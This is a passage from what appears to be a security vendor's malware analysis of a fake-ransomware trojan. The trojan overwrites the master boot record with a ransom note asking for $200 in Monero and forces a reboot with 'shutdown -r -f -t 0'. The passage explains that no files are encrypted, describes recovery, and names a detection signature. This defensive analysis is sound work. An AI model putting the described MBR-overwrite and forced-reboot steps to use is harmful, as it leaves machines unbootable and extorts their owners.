If the above test passes, it proceeds to open a handle to the physical drive again and overwrite the MBR using the WriteFile API call:

 

Arguments on the stack point to the ransom text to be displayed after reboot:

 

After succesfully overwriting the MBR with the ransom text, the trojan executes “shutdown -r -f -t 0” using WinExec to immediately reboot the system:

 

Upon reboot, the following ransom text is displayed and the machine is unable to boot as normal:

 

The only modification to the filesystem is the overwritten MBR.  No files have actually been encrypted and there is no encryption functionality present in the malware.  Although files can easily be restored by mounting the filesystem using a live OS booted via a memory stick, most users will likely consider their files gone and perform a full reinstall.  There is no contact information provided to “restore” files and no way of verifying if paying the $200 in Monero will suffice.

 

SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

  • GAV: KillMBR.RSM (Trojan)